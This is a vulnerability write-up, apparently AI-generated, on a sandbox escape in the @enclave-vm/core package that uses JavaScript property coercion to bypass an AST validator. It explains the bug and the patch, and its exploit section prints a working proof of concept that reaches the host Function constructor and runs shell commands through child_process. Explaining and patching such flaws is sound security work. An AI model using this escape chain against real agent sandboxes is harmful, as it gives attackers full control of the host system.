CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-27597

Breaking the Enclave: How JavaScript Coercion Shattered a Sandbox

Alon Barad
Alon Barad
Software Engineer

Feb 25, 2026·6 min read·61 visits

Executive Summary (TL;DR)

A critical RCE vulnerability in @enclave-vm/core allowed attackers to escape the sandbox by exploiting JavaScript's property coercion rules. The validator blocked explicit access to 'constructor', but missed dynamic keys like `obj[{toString:()=>'constructor'}]`. This leads to full host compromise.

In the world of AI agents, executing untrusted code is a necessary evil. @enclave-vm/core promised a 'secure' environment to run this code, wrapping standard JavaScript objects in protective boundaries. However, a critical flaw in its AST validation logic failed to account for one of JavaScript's most chaotic features: implicit type coercion. By tricking the validator with objects that look innocent statically but scream 'constructor' at runtime, attackers could break out of the sandbox and execute arbitrary commands on the host system.

The Illusion of Safety

Building a secure sandbox in JavaScript is like trying to hold water in a sieve. The language is dynamic, reflective, and notoriously permissive. The @enclave-vm/core package attempts to solve this by creating a restricted execution environment for AI agents. It uses an AST (Abstract Syntax Tree) validator to scan code before it runs, looking for 'dangerous' patterns. The idea is simple: if the code tries to access sensitive properties like constructor, __proto__, or prototype, the validator shouts 'NO' and throws an error.

This approach relies on a static view of the code. The validator looks at the text and decides if it's safe. But JavaScript is not a static language. It is a shifting, morphing beast where things are rarely what they seem until the exact moment of execution. The developers of Enclave fell into the classic trap of confusing the map (AST) with the territory (Runtime).

Because the validator focused on blocking specific string literals, it assumed that if it didn't see the string 'constructor', the code was safe. They locked the front door, bolted the windows, and installed a security camera. But they forgot that JavaScript has a magic spell that turns a pumpkin into a carriage—or in this case, an innocent-looking object into a malicious string.

The Flaw: JavaScript's Original Sin

The vulnerability (CWE-94) lies in how JavaScript handles computed property names. When you access a property using bracket notation, like object[key], the engine has to evaluate key. If key isn't a string, JavaScript helpfully tries to turn it into one. This is called implicit type coercion, and it is the root of many security nightmares.

The Enclave validator had a rule called DisallowedIdentifierRule. It checked for member expressions. If you wrote obj.constructor, it saw the identifier constructor and blocked it. If you wrote obj['constructor'], it saw the string literal 'constructor' and blocked it. So far, so good.

But what if you write this?

const key = { toString: () => 'constructor' };
obj[key];

Statically, the AST sees an object literal inside the brackets. It doesn't look like the string 'constructor'. It looks like generic code. The validator, lacking a crystal ball, lets it pass. But at runtime, the JavaScript engine calls toString() on that object, gets the string 'constructor', and hands over the keys to the kingdom. The sandbox thought it was looking at a harmless object; the runtime saw a weapon.

The Smoking Gun

Let's look at the code. The logic failure was in DisallowedIdentifierRule.ts. It was too literal. It checked if the property being accessed was a direct match for the blacklist. It didn't simulate the runtime behavior of complex expressions.

The fix, implemented in commit 09afbebe4cb6d0586c1145aa71ffabd2103932db, introduces a new utility called coercion-utils.ts. This utility is essentially a mini-simulator. It tries to predict what a piece of AST will become at runtime. It handles arrays (which coerce to comma-separated strings), templates, and conditional expressions.

Here is a simplified view of the fix logic:

// BEFORE: Naive check
if (node.property.type === 'Literal' && 
    BLACKLIST.includes(node.property.value)) {
  throw new Error('Access denied');
}
 
// AFTER: Deep static analysis
const possibleKeys = tryGetStaticComputedKeys(node.property);
for (const key of possibleKeys) {
  if (BLACKLIST.includes(key)) {
    throw new Error(`Potential access to disallowed property: ${key}`);
  }
}

The new tryGetStaticComputedKeys function is paranoid. If it sees ['__proto__'], it knows that becomes '__proto__'. If it sees a template literal like `cons$\{'tructor'\}`, it resolves it. It forces the validator to think like the engine.

The Exploit: Escaping the Matrix

So, how do we weaponize this? We need to get a handle on the host's process object to run shell commands. The sandbox wraps objects in a SafeObject proxy, but the native Object constructor is the gateway out. We can't access Object directly, but every object has a constructor property that points to it.

Here is the attack chain:

  1. Bypass the Filter: We use an array coercion trick. ['constructor'] coerces to the string 'constructor'.
  2. Get the Constructor: We access ({}).constructor via our coercion trick. Now we have the native Object function.
  3. Find the Leaks: We use Object.getOwnPropertyDescriptors(this) to inspect the global scope. It turns out Enclave left a debugging reference exposed: __host_memory_track__. This object wasn't properly sanitized.
  4. Pivot to Function: We use the coercion trick again on __host_memory_track__ to get its constructor, which is the host's Function constructor.
  5. RCE: The Function constructor allows us to create code that runs outside the sandbox completely.

Here is the exploit code that breaks it open:

// 1. Create a key that looks innocent but coerces to 'constructor'
// In JS, ["string"] coerces to "string"
const hiddenKey = ['constructor'];
 
// 2. Access the native Object constructor
// The validator sees an ArrayExpression, not a Literal string
const hostObject = {}[hiddenKey]; 
 
// 3. Find the leaked internal reference
const descriptors = hostObject.getOwnPropertyDescriptors(this);
const leakedRef = descriptors.__host_memory_track__.value;
 
// 4. Get the Function constructor from the leak
const HostFunction = leakedRef[hiddenKey];
 
// 5. Generate a function outside the sandbox and run it
const escapeFn = HostFunction('return process.mainModule.require("child_process").execSync("id").toString()');
console.log(escapeFn());

If successful, this prints the uid of the server running the sandbox. Game over.

The Impact

This is a CVSS 10.0 for a reason. RCE in a sandbox designed for AI agents is catastrophic. AI agents are often designed to execute code generated by LLMs or provided by users to perform tasks. If you can break the sandbox, you own the infrastructure.

The exploit is reliable, requires no authentication (if the agent is public-facing), and works on the default configuration of the library. It allows for full data exfiltration, installation of persistence mechanisms, or pivoting to internal networks. For a library named "Enclave," this vulnerability turned it into an open market.

Remediation

The fix is straightforward: Update to version 2.11.1. The vendor (AgentFront) acted quickly.

If you cannot update immediately, you are in trouble. There is no easy configuration change to fix this because the flaw is in the core validation logic. You could try to manually sanitize input code to reject array literals or object literals inside square brackets, but that is a game of whack-a-mole you will likely lose.

For security researchers and developers, this is a lesson in input validation: never trust the static representation of dynamic code. If your security model relies on checking strings in an AST, you are likely vulnerable to coercion attacks. Always assume the runtime will find a way to surprise you.

Official Patches

GitHubCommit fixing the coercion vulnerability

Fix Analysis (1)

Technical Appendix

CVSS Score
10.0/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Probability
0.29%
Top 48% most exploited

Affected Systems

@enclave-vm/core (npm package)AI Agent Runtimes using Enclave

Affected Versions Detail

Product
Affected Versions
Fixed Version
@enclave-vm/core
AgentFront
< 2.11.12.11.1
AttributeDetail
CWECWE-94 (Code Injection)
CVSS v3.110.0 (Critical)
VectorAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack VectorProperty Coercion / AST Bypass
Exploit StatusFunctional PoC Available
Patchv2.11.1

MITRE ATT&CK Mapping

T1059Command and Scripting Interpreter
Execution
T1203Exploitation for Client Execution
Execution
CWE-94
Improper Control of Generation of Code ('Code Injection')

Known Exploits & Detection

Research PoCSandbox escape using array and object coercion to access host constructors.

Vulnerability Timeline

Fix authored and committed
2026-02-22
CVE Published / Advisory Released
2026-02-25

References & Sources

  • [1]GHSA-f229-3862-4942: Sandbox Escape in @enclave-vm/core

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 1 hour ago•CVE-2026-49866
7.5

CVE-2026-49866: CPU-Based Denial of Service in @libp2p/gossipsub Protobuf Parser

A high-severity denial-of-service vulnerability in @libp2p/gossipsub prior to version 16.0.0 allows unauthenticated remote attackers to trigger event loop starvation and complete node freeze by exploiting unbounded protobuf decoding limits and nested synchronous array iteration loops.

Amit Schendel
Amit Schendel
3 views•6 min read
•about 2 hours ago•CVE-2026-49858
5.9

CVE-2026-49858: Cross-User Attribute and Relation Leak in API Platform Core Serializers

CVE-2026-49858 is a vulnerability in API Platform Core's JSON:API and HAL item normalizers where conditionally secured attributes are cached globally in memory. When deployed in long-running PHP execution environments such as FrankenPHP worker mode, Swoole, or RoadRunner, this persistent caching bypasses property-level security constraints, allowing unprivileged users to access sensitive, unauthorized fields cached during privileged requests.

Alon Barad
Alon Barad
4 views•7 min read
•about 3 hours ago•CVE-2026-5078
5.3

CVE-2026-5078: Log Forging and Injection via :remote-user Token in Morgan Logging Middleware

CVE-2026-5078 is a log injection vulnerability in Morgan, the widely deployed Node.js HTTP request logging middleware. The vulnerability arises because the ':remote-user' logging token decodes and outputs basic authentication usernames containing control characters, such as Carriage Return (CR) and Line Feed (LF), without sanitization. An unauthenticated attacker can bypass native HTTP header parsers by Base64-encoding CRLF sequences in the Authorization header. When Morgan logs the request, these control characters force newlines in the log stream, enabling log forging, SIEM evasion, and system activity spoofing.

Alon Barad
Alon Barad
5 views•7 min read
•about 14 hours ago•CVE-2026-48861
2.1

CVE-2026-48861: HTTP Request Splitting and Smuggling via Method Parameter CRLF Injection in Elixir Mint

CVE-2026-48861 is a client-side HTTP request-line CRLF (Carriage Return Line Feed) injection vulnerability in the popular Elixir HTTP client library, Mint. The vulnerability permits HTTP Request Splitting and HTTP Request Smuggling when an application forwards untrusted, attacker-controlled inputs to Mint's HTTP client requests as either the HTTP request method or target. By embedding CRLF characters within these parameters, an attacker can terminate the request line prematurely, inject malicious headers, or pipeline entirely independent requests. These smuggled requests are then processed by upstream or downstream proxy servers as separate HTTP queries on the same TCP connection. While Mint version 1.7.0 introduced target validation to secure the request target, the HTTP request method parameter remained completely unvalidated. This flaw allows attackers to bypass routing filters, access restricted internal APIs, or poison HTTP caches under default configurations.

Amit Schendel
Amit Schendel
6 views•7 min read
•about 14 hours ago•CVE-2026-49753
6.3

CVE-2026-49753: HTTP Request/Response Smuggling via Inconsistent Content-Length Parsing in Elixir Mint Client

An Inconsistent Interpretation of HTTP Requests (HTTP Request/Response Smuggling) vulnerability in the Elixir Mint HTTP client allows attacker-controlled HTTP/1 servers to desynchronize response framing on shared connections due to over-lenient parsing of sign-prefixed Content-Length headers.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 15 hours ago•CVE-2026-49754
8.2

CVE-2026-49754: Denial of Service via Unbounded HTTP/2 CONTINUATION Frame Accumulation in Elixir Mint

An allocation of resources without limits or throttling vulnerability in Elixir Mint allows an attacker-controlled HTTP/2 server to exhaust memory in a Mint client. The vulnerability is exploited by sending a HEADERS frame without the END_HEADERS flag followed by an infinite stream of CONTINUATION frames. Because the client lacks limits on the incoming header-block accumulator, the client continuously consumes memory until an out-of-memory crash occurs.

Amit Schendel
Amit Schendel
7 views•6 min read